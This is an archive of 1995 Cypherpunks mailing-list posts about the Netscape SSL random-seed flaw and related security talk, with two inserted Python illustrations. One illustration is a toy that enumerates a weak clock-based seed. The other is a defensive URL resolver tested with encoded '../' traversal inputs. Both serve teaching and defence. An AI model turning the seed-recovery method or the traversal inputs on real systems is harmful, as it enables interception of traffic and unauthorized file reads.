   the original, and it said today that it would release this
   updated version within the next few weeks. But first it
   will remove the newly disclosed flaw, which is currently in
   the new version.

   "The good news and the bad news of the Internet is that
   when you put something up there, many more people can test
   it," said Mike Homer, the vice president of marketing at
   Netscape. "You also give yourself the opportunity of having
   people point things out which you can fix quickly."

   The company so far has distributed most copies of its
   program free over the Internet, under a strategy of making
   its money from commercial customers who use Netscape to
   provide services or for other business applications over
   the World Wide Web. So replacing the copies will not be an
   expensive undertaking.

   Instead, for Netscape Communications and for other
   companies betting their futures on the Internet, the real
   cost of this disclosure may be in the public's shaken
   confidence in the ability of computer companies to insure
   privacy and security for on-line commerce.

   The weakness in Netscape's security was discovered by Ian
   Goldberg, 22, and David Wagner, 21, two computer science
   students who share an office at the university and who also
   share an interest in the arcane science of cryptography,
   which is becoming increasingly important for business as
   companies begin to explore electronic commerce.

   The two students said they had decided to put the software
   to a test in an effort to raise public concern about
   placing too much trust in unproved electronic security
   systems.

   Netscape's security is based on a type of coding technology
   known generically as public key cryptography in which users
   exchange mathematically generated numbers -- or keys -- to
   encode or decode information. In such systems, a new key is
   created for each information exchange, based on a
   mathematical formula that is combined with numbers
   supposedly known only to the sender or recipient.

   The students found that by determining how Netscape's
   formula generated the number used as a starting point for
   creating a key, they were able to greatly reduce the
   potential combinations that would unlock the code. The
   starting-point number turned out to be based on the time
   and date of the transaction, combined with several other
   unique bits of information taken from a user's computer
   system -- bits of information that an electronic intruder
   could determine, if he were intent on intercepting a
   Netscape user's transactions.

   Knowing how the starting-point number was created greatly
   reduced the other possible components of the formula -- and
   the students found they were able to break the code in a
   matter of seconds using a standard computer work station.

   Netscape officials said today that they would strengthen
   the system, by making it significantly harder to determine
   the random number at the heart of their coding system. They
   said they would no longer disclose what data would be used
   to generate the random numbers.

   The announcement of the flaw was posted Sunday night on a
   computer network mailing list maintained by an informal
   group known as Cypherpunks. The group, which is made up of
   mathematicians, computer experts and privacy advocates, has
   been campaigning for more effective electronic security
   systems.

   The discovery is the second reported security weakness in
   the Netscape program to be posted on the Cypherpunks list
   in the last month. In August, Damien Doligez, a student at
   the Ecole Polytechnique in Paris, used a network of 120
   computers, running for eight days, to generate a Netscape
   secret key. But his was a "brute force" attack, requiring
   the computers to sample a vast range of numbers before
   coming up with a key that would break the code.

   The Berkeley students, in contrast, by identifying a basic
   flaw in the way Netscape set up its security system, were
   able to narrowly focus their attack to quickly break the
   code, with far less computer power.

   [End]
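Added example (not part of the article or of this post, and not Netscape's actual code): a constructed toy showing why a key derived from a seed built only from the clock and a process id has the strength of the seed, not of the nominal key length. The seed formula, the key derivation, the `fingerprint` helper and all sample values are assumptions made for illustration.

```python
import hashlib
import math
import secrets

KEY_BITS = 128  # nominal key length of the toy session key


def weak_seed(sec: int, msec: int, pid: int) -> bytes:
    """Constructed seed built only from clock and process id (an assumption,
    not the formula the article describes)."""
    return hashlib.sha256(f"{sec}:{msec}:{pid}".encode()).digest()


def strong_seed() -> bytes:
    """Seed drawn from the operating system's CSPRNG."""
    return secrets.token_bytes(32)


def derive_key(seed: bytes) -> bytes:
    """Toy key derivation: the key is a pure function of the seed."""
    return hashlib.sha256(b"session-key|" + seed).digest()[: KEY_BITS // 8]


def fingerprint(key: bytes) -> str:
    """Stand-in for any observable value that depends on the key."""
    return hashlib.sha256(b"fp|" + key).hexdigest()


def effective_bits(*choices: int) -> float:
    """Entropy in bits of a seed drawn from the product of the value counts."""
    return sum(math.log2(c) for c in choices)


def audit_seed(observed_fp, sec_range, msec_range, pid_range):
    """Enumerate every seed the inputs allow.

    Returns ((sec, msec, pid), tries) on a match, else (None, tries).
    """
    tries = 0
    for sec in sec_range:
        for pid in pid_range:
            for msec in msec_range:
                tries += 1
                key = derive_key(weak_seed(sec, msec, pid))
                if fingerprint(key) == observed_fp:
                    return (sec, msec, pid), tries
    return None, tries


def demo():
    # Constructed sample values, not taken from any real session.
    sec, msec, pid = 811_476_000, 417, 1234
    fp = fingerprint(derive_key(weak_seed(sec, msec, pid)))
    # Assume the time is known to within one second either way, the clock
    # has millisecond resolution, and the pid lies in a range of 100 values.
    found, tries = audit_seed(
        fp, range(sec - 1, sec + 2), range(1000), range(1200, 1300)
    )
    weak_bits = effective_bits(3, 1000, 100)
    return found, tries, weak_bits


if __name__ == "__main__":
    found, tries, weak_bits = demo()
    print(f"seed inputs recovered: {found} after {tries} tries")
    print(f"effective strength: {weak_bits:.1f} bits, nominal: {KEY_BITS} bits")
```

The same audit run against a key made from `strong_seed()` finds nothing, because that seed is not a function of guessable inputs.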












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 20:55:59 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <199509190355.XAA01329@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Markoff's article in the Times says:
>    Netscape officials said today that they would strengthen
>    the system, by making it significantly harder to determine
>    the random number at the heart of their coding system. They
>    said they would no longer disclose what data would be used
>    to generate the random numbers.

Not, of course, that they disclosed it before -- it was found by
reverse engineering the distributed executable. Not, of course, that
they have a choice in the matter of whether to disclose it -- they
will be "disclosing" how it's done as soon as they release the
code. Not, of course, that security through obscurity does any good --
it just magnifies the pain.

I suspect that there are far more flaws in Netscape. String buffer
overflows are another good guess here -- they are probably rampant
through the code both for the browser and the commerce server they
sell. I can't prove it myself, of course, given that I don't have the
time to rip the thing apart, but the same folks never seemed to learn
their lesson in release after release when they worked at NCSA, and
the only thing that's probably keeping their dignity here is the lack
of distributed source code.

I'll pay for the "I broke Netscape's Security" T-Shirt for the
enterprising person that takes the time to find them in the object
code. (See Sameer's page on the shirts he's developing as prizes for
the Netscape flaw finders.)

Two "I broke Netscape's Security" T-Shirts to that daring soul at
Netscape who finds the next flaw and has the balls to mention it in
public instead of sweeping it under the carpet -- even if the person
is Marc Andreessen.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 18 Sep 95 21:08:22 PDT
To: vince@offshore.com.ai
Subject: Re: Hurricane Luis in Anguilla / Cellphone Antenna
In-Reply-To: <v02120d00ac83e18d8f6f@[199.0.65.105]>
Message-ID: <Pine.SOL.3.91.950918235250.23093A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Assuming your cellphone operates in the 800 MHz range, transmitting with 
about 1 W., I think you're out of luck.

With UHF and particularly at low power levels, you just about have to be 
line-of-sight to the receiving antenna. Guessing how high up your antenna 
might be and how high the receiving antenna could be, I would say you 
would be lucky to achieve a range of 20 miles.  I'd be astonished at 
anything over 50.

Brad

On Mon, 18 Sep 1995, Robert Hettinga wrote:

> 
> --- begin forwarded text
> 
> Date: Mon, 18 Sep 1995 13:24:33 +24000
> From: Vincent Cate <vince@offshore.com.ai>
> Subject: Hurricane Luis in Anguilla / Cellphone Antenna
> To: Steve Roberts <wordy@qualcomm.com>
> cc: Technomads <technomads@UCSD.EDU>
> MIME-Version: 1.0
> 
> 
> 
> Hurricane Luis took Anguilla apart.  The three utility poles right near my
> house all blew down.  My house, computers, etc are all fine.
> 
> Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems
> there were many people killed.  They have a lot of poor people there
> and also a lot of people used to live in boats.  More than 1,000 of
> about  1,400 boats sank.
> 
> The eye went right over Anguilla.  For awhile it was calm enough that
> everyone went outside to stretch and say hi to everyone.  Overall it
> took about 4 days to pass.
> 
> It has been nice to have solar panels, batteries, an inverter, etc. I did
> not have a cellphone, but I do now.
> 
> And now that I have one I am really interested in the directional antenna
> that might let me reach other islands - in particular the US Virgin
> islands where long distance rates are $0.10/min at night with sprint
> instead of the $2/min that we pay here in Anguilla.  Does anyone know
> where I can order a directional cellphone antenna (boat antenna) good for
> 100 miles?
> 
>   --  Vince
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com> (by way of carolann@censored.org (Censored Girls Anonymous))
Date: Mon, 18 Sep 95 22:03:04 PDT
To: cypherpunks@toad.com
Subject: FC's Opus
Message-ID: <199509190502.WAA01521@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Radio is blaring it out on KFAN and ABC RADIO now.

What if all it is,
is
a Detweiler tentacle?
hahahaha

Love Always,

Carol Anne.....coming to DC and NYC soon


The NY Times reports in tomorrow's paper that it and The 
Washington Post are publishing the Unabomber's 35,000-word 
manifesto as a separate pullout in The Washington Post 
tomorrow, as advised by AG Reno and FBI Director Freeh.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 18 Sep 95 21:04:57 PDT
To: cypherpunks@toad.com
Subject: Brute Force and Smart Force
Message-ID: <199509190405.AAA03711@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	I think it's worth pointing out that instead of taking (arguably) $10,000 
worth of computer time to brute force SSL, Goldberg-Wagner's attack exploits a 
weakness in the system to spend maybe a few dollars to crack it.

	Clever attacks on cryptosystems like this are the bread and butter of 
'practical' cryptanalysis.  It might take until slightly after the heat death 
of the universe to break IDEA or your 2048 bit RSA key, but there exist other 
attacks, and they are the ones which will be exploited.

	(Also, as Robert Morris pointed out, never underestimate the time, money or 
effort your opponent will put into cryptanalysis.  Cypherpunks, collectively, 
have put a great deal of time, effort, and CPU into proving SSL bogus, and I 
don't think anyone here made any money doing it.)

	Perhaps we should refocus our efforts on attacking PGP, to see if there are 
holes there?  (I'm not suggesting there are, but it would be nice to see some 
code written to extend Crack to phrases, do some more code review, etc.)

Adam

-- 

"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 18 Sep 95 21:11:00 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <199509190224.WAA03110@toxicwaste.media.mit.edu>
Message-ID: <Pine.SUN.3.91.950919000335.1167A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Derek Atkins wrote:

> Hi.  PGP 2.6.2 compiles out-of-the-box on Linux.  In fact, Linux is my
> personal development platform at home, so I make sure that it works.
> Just "make" in rsaref/install/unix, and then "make linux" in src.

Heh.  It's not QUITE so simple.  :)

If you're running an ELF system, you have to pretend it's a sys v system 
(or, alternatively, remove all the leading underscores in the .globl 
names in the assembly language (*.S) files).

Also, you should upgrade to the latest 1.2.x version of linux, as there 
was a fairly large memory leak until 1.2.11 or 1.2.12 or so...

OBCrypto: UNIX confuses me :)
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 00:18:35 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190703.DAA03247@clark.net>
Message-ID: <199509190713.AAA01128@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   I doubt this in the case of the browser. At least as far as the
> parsing is concerned. There may be a buffer overflow for example,

	Buffer overflow seems like a much greater concern when dealing
with a server. Particularly one which is supposedly "secure", and
accessing "secured" documents. Even with the server running as
'nobody' if someone can implement buffer overflow to get access to
documents they shouldn't then that would count as a pretty significant
hack.

	I suspect that the server is where the majority of the bugs
lie. My Hack Netscape page emphasizes the server as a place to look
for holes.


> when you input the url in the "open" window, but that has to be
> done manually by the user and isn't a threat, like a "rogue homepage"
> would be. The reason I doubt string buffer overflows in the case of
> the browser is that it seems to be written in some object oriented
> language, perhaps C++ (or maybe just oo-C like BSAFE). Once you
> have a general robust String class, you can prove it's non-overflowable,
> and therefore no composition of operations from the browser code will
> overflow it (unless of course, you break language safety by using
> casts and pointer manipulation) Secondly, Netscape has been very
> robust in my own testing against these common bugs. One of the things
> I've done lately is "tiger team" attacks against servers and browsers.
> (of course, sendmail is a brilliant counter example)
> (if you can find a call to gets() in Netscape, I will instantly 
> retreat ;-) )
> 
>   Netscape's security may be bad, but the rest of their browser, or at least
> their development process, is good engineering. They've built a very
> complex application, fairly quickly, that runs with very few bugs,
> across a wide variety of operating systems and GUI's, while maintaining
> a consistent user interface and feature set. Netscape 2.0 incorporated
> Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't
> expecting a Java capable Netscape until at least December). I'd like to
> see Microsoft develop a piece of code that quickly that runs on
> umpteen different flavors of Unix, MacOS, and Win3.1/95/NT. Hell, they
> can't even write code that runs smoothly across all three
> flavors of their operating system.
> 
> -Ray
> 
> 
>  
>    
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 18 Sep 95 21:15:19 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950919001218.15297A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, John Young wrote:

>    The New York Times, September 19, 1995, pp. A1, D21.
> 
> 
>    Security Flaw Is Discovered In Software Used in Shopping
> 
>    By John Markoff
> 
>    Today, as word of the security flaw circulated only within
>    fairly small circles of Internet users, Netscape's stock
>    closed with a slight loss, down 75 cents, to $52.50, in low
>    Nasdaq trading volume.

Gotta like that open sell order.  :)

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Sep 95 21:20:46 PDT
To: cypherpunks@toad.com
Subject: FC's Opus
Message-ID: <199509190420.AAA16227@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NY Times reports in tomorrow's paper that it and The 
Washington Post are publishing the Unabomber's 35,000-word 
manifesto as a separate pullout in The Washington Post 
tomorrow, as advised by AG Reno and FBI Director Freeh.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 18 Sep 95 21:20:38 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <Pine.SUN.3.91.950919002101.15456A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



I've been having mail problems of late.

Did you get my letter on your tax issue?


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 21:25:03 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Brute Force and Smart Force
In-Reply-To: <199509190405.AAA03711@homeport.org>
Message-ID: <199509190424.AAA01393@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Perhaps we should refocus our efforts on attacking PGP, to see
> if there are holes there?  (I'm not suggesting there are, but it
> would be nice to see some code written to extend Crack to phrases,
> do some more code review, etc.)

Probably a worthwhile enterprise. Unfortunately, Netscape and the like
are low hanging fruit -- it's much simpler to find holes in things, er,
of that, er, ah, quality -- and one probably rightfully gets more
press for breaking them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 21:28:11 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <Pine.SUN.3.91.950919002101.15456A-100000@polaris.mindport.net>
Message-ID: <199509190427.AAA01402@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> I've been having mail problems of late.
> Did you get my letter on your tax issue?

Yes, but I've been preoccupied by the latest internet political
scandal over domain registration. Thank you greatly for the
information; I'll probably ask you a question or two within a few
days when my mail volume goes below 500 a day again.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 21:28:51 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <Pine.SUN.3.91.950919002101.15456A-100000@polaris.mindport.net>
Message-ID: <199509190428.AAA01410@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eek. Lovely accident. Never reply to "all" without checking the "to"
list. Sigh.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Mon, 18 Sep 95 21:32:59 PDT
To: cypherpunks@toad.com
Subject: taxonomies of 'real money' and e-cash
In-Reply-To: <Pine.3.89.9509161138.G23340-0100000@wane3.scri.fsu.edu>
Message-ID: <Pine.3.89.9509190028.C29056-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On the 15th of September, Tim May wrote -

. . .

> "Digital money" currently has only a few ways of dealing with transfers of
> value in transactions. A lot of the problems come, in my view, from this
> relatively spartan set of "primitives."
> 
> Where are the cryptographic equivalents of:
> 
> - money orders
> 
> - promissory notes
> 
> - receipts
> 
> - warrants
> 
> - lockboxes
> 
> - bearer bonds
> 
> - options
> 
> - time deposits
> 
> - coupons
> 
> - escrow
> 
> - IOUs
> 
> - zero coupon bonds
> 
> - checks
> 
> ...and so on. The terms in any good dictionary of financial terms (such as
> the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many
> of these things are built up out of more basic things, with mix-ins from
> other classes, or with modified methods.)
> 
> A look at any book on money and finance shows a rich "microworld" of
> "things" and "procedures" (classes and methods attached to classes). The
> classes have subclasses, and the methods have various behaviors and
> "expectations" attached (more than just simple class behavior, more of an
> AI or agent flavor, in my view).
> 

. . . .

> 
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
 Maybe I'm missing the larger point, but isn't it accurate that in the 
digital world, one protocol or procedure may take the place of perhaps 
several of the 'real-world' procedures or protocols?  An effective 
mechanism of signing with non-repudiation that was recognized as binding 
on the signer would permit 'checks', 'promissory notes', 'IOUs', and 
'warrants'.  Some of the other species listed in your post aren't really 
money, anyway.  They are things you can buy with money, like stock 
certificates or Maseratis.  One could conceivably buy convertible 
debentures with e-cash, the same as one could buy them with 'real money', 
but it doesn't follow that there should be some one-to-one mapping of real 
money objects and classes onto electronic analogues.  Once again, I've 
probably missed the forest, but a couple of the trees distracted me.

--PJ Ponder




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 00:53:18 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190734.DAA09824@clark.net>
Message-ID: <199509190748.AAA03614@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> http://www.isp.com/company1/passwd   contains the passwd file for the
> http://www.isp.com/company1/   URL directory. Although it is convenient
> to store the passwd file within the hierarchy it is protecting, care
> must be taken to make it unreadable by normal HTTP requests. It's better 
> to put it in a configuration directory somewhere where no server
> has access to. (I've seen this mistake plenty of times)

	The server process itself still needs access to that file
though in order to verify passwords, so it can't be totally
protected-- a bug in the server might reveal the password file. A
relatively minor point..

> 
>   A barebones web server is a pretty simple piece of software compared
> to a browser (or sendmail), so it should be possible to make them
> much more secure.

	Right. The Netscape Commerce server, on the other hand, is by
no means a barebones webserver. It has a full-featured API which
allows dynamic loading of custom-written modules to handle every
aspect of web servering. Its configuration files, while not as
complex as sendmail config files, are rather complex. The server comes
with a "GUI administration tool", which allows you to configure the
server using netscape over HTTP to a special server, -running as
root-, which can modify configuration files, restart the server,
etc. (I am not sure if the administration server -must- run as root,
but that is how it has been configured in the installations I have
seen.)
	Even extremely good security programmers could probably not
write such a complex program without bugs, particularly on the
timescale for which you have commended Netscape. (Extremely good
ethical security programmers may not even be -willing- to write such a
complex program and declare it secure)
	There is actually an interesting parallel to sendmail in
webservers..webservers have a very vital 'rewriting' phase, where they
turn the url (/~sameer for example) into a filename
(/u1/sameer/public_html/index.phtml) This phase is where it checks
ownership, checks symlinks, etc. I figure that section may be rife
with holes, given the incredibly powerful rewriting that the highly
flexible servers can do these days.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
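The URL-to-filename "rewriting" phase discussed above, with the checks a defender
would want in it, as an added example that is not part of the original message and
is not Netscape's code. The function names, the denied file name "passwd" and the
temporary directory layout are assumptions constructed for illustration.

```python
import os
import tempfile
from urllib.parse import unquote

INDEX_NAME = "index.phtml"   # index file name from the message's example path
DENY_NAMES = {"passwd"}      # assumption: per-directory password file name


def resolve(url_path, docroot, user_homes):
    """Map a URL path to a real file, or return None if the request is refused."""
    path = unquote(url_path.split("?", 1)[0])
    if not path.startswith("/") or "\x00" in path:
        return None

    if path.startswith("/~"):            # /~user/... -> <home>/public_html/...
        user, _, rest = path[2:].partition("/")
        home = user_homes.get(user)
        if home is None:
            return None
        base, per_user = os.path.join(home, "public_html"), True
    else:
        base, rest, per_user = docroot, path[1:], False

    # Resolve "..", duplicate slashes and symlinks BEFORE any access decision.
    base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, rest))
    if os.path.isdir(candidate):
        candidate = os.path.realpath(os.path.join(candidate, INDEX_NAME))

    # Containment is judged on the resolved path, so a symlink or an encoded
    # "../" that leaves the served tree is refused.
    if os.path.commonpath([base, candidate]) != base:
        return None
    # The password file may live inside the tree it protects, but it is never
    # served, whatever name or link was used to reach it.
    if os.path.basename(candidate) in DENY_NAMES:
        return None
    if not os.path.isfile(candidate):
        return None
    # Ownership check for user directories: the file must belong to the owner
    # of the public_html directory it is served from.
    if per_user and os.stat(candidate).st_uid != os.stat(base).st_uid:
        return None
    return candidate


def build_sample_tree():
    """Create a constructed document tree in a temp directory for the demo."""
    root = tempfile.mkdtemp(prefix="urlmap-")
    docroot = os.path.join(root, "docroot")
    home = os.path.join(root, "u1", "sameer")
    files = {
        os.path.join(root, "secret.txt"): "outside every served tree\n",
        os.path.join(docroot, "index.phtml"): "site index\n",
        os.path.join(docroot, "company1", "report.html"): "protected report\n",
        os.path.join(docroot, "company1", "passwd"): "user:constructed-hash\n",
        os.path.join(home, "public_html", "index.phtml"): "home page\n",
    }
    for name, body in files.items():
        os.makedirs(os.path.dirname(name), exist_ok=True)
        with open(name, "w") as fh:
            fh.write(body)
    # A link inside public_html that points outside it.
    os.symlink(os.path.join(root, "secret.txt"),
               os.path.join(home, "public_html", "leak"))
    return docroot, {"sameer": home}


if __name__ == "__main__":
    docroot, homes = build_sample_tree()
    for url in ("/~sameer", "/company1/report.html", "/company1/passwd",
                "/company1/%2e%2e/%2e%2e/secret.txt", "/~sameer/leak"):
        print(url, "->", resolve(url, docroot, homes))
```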



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 18 Sep 95 22:50:26 PDT
To: shields@tembel.org (Michael Shields)
Subject: Re: PGP for Linux 1.2.8
Message-ID: <199509190604.BAA10003@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:39 AM 9/19/95 +0000, you "wrote":
>Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
>

I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
it's worth saying, then *say* it.

Thank you.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF49HsVrTvyYOzAZAQE9aQP+JYa+eglyQCWWHxt5AexhapWyURziXX31
UN97I287MtJw62us1Usr3rpgSbm/7C1LaIZP4ucY0rEXXfvSRzbOPnaa0nPb18e/
Axf/5RzjsrgjvHiXsXm8e2/7z6fe+dByA6qSKLaE77yOkKNEoEPbUeJrjzX7PKSR
qLFotWpaYvs=
=VGzR
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 19 Sep 95 01:19:55 PDT
To: perry@piermont.com
Subject: Re: Brute Force and Smart Force
In-Reply-To: <199509190424.AAA01393@frankenstein.piermont.com>
Message-ID: <199509190819.BAA15784@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Adam Shostack writes:
| > 	Perhaps we should refocus our efforts on attacking PGP, to see
| > if there are holes there?  (I'm not suggesting there are, but it
| > would be nice to see some code written to extend Crack to phrases,
| > do some more code review, etc.)
| 
| Probably a worthwhile enterprise. Unfortunately, Netscape and the like
| are low hanging fruit -- it's much simpler to find holes in things, er,
| of that, er, ah, quality -- and one probably rightfully gets more
| press for breaking them.

What I don't understand is why the law-enforcement is so concerned 
about bruting things. It is probably quite easy to tap the keyboard,
smart force, exchange the binary with the real thing etc for them?

(Unless they want to read it all from a nice tipped-back armchair in
a certain location? :-))

What I'm saying is that this kind of attack should work quite easily
in the one-by-one cases, but not on a large scale, malicious data,
trojan horses, outright bugging. So why all this Clipper (son-of-X)
fuss? 

Ok, not for all data, especially not for the "untouched, rarely used"
ones. But is this any different from hiding your diary in a very safe
place anyway?

/Christian







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Mon, 18 Sep 95 22:47:48 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Caribbean Internet Services?
In-Reply-To: <ac835f9008021004ec69@[205.199.118.202]>
Message-ID: <199509190524.BAA00324@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> ObCypherpunks Relevance: A couple of past or current list members have
> nascent Internet plans in some of these islands. (I think one of them is
> way south, just off Venezuela.)
 
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> they were a few months ago.
> 
> --Tim May

I'm not as familiar w/ the VI's as other parts of the Carib, but I can
say that Curacao is no St. Thomas. It's got real buildings, high ground
and substantial infrastructure.  You want primitive, try Guyana.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 19 Sep 95 02:21:51 PDT
To: cypherpunks@toad.com
Subject: Re: VeriSign Introduces the First Digital ID Issuing Service
In-Reply-To: <9509181742.aa29912@ncrhub1.ATTGIS.COM>
Message-ID: <950919.012810.3g2.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, Chris.Claborne@SanDiegoCA.ATTGIS.COM quotes
a VeriSign press release:

> Class One Digital IDs: These IDs insure the uniqueness of a name or
> e-mail address. Class One Digital IDs are primarily used for casual
> World Wide Web browsing and secure e-mail. VeriSign offers
> non-commercial Class One Digital IDs at no cost or VeriSign supported
> commercial versions for $6.

> Netscape Navigator 2.0 users will be able to download Class One Digital
> IDs from VeriSign's new Online Digital ID Issuing Service on the World
> Wide Web beginning in late October.

I can foresee some possible DOS attacks against the Class One
certificate.  (p'raps I should get mine forthwith?)  And what
protection is VeriSign offering against the misuse of our certificates
(given that VeriSign must undoubtedly hold copies of all the issued
certs).
- -- 
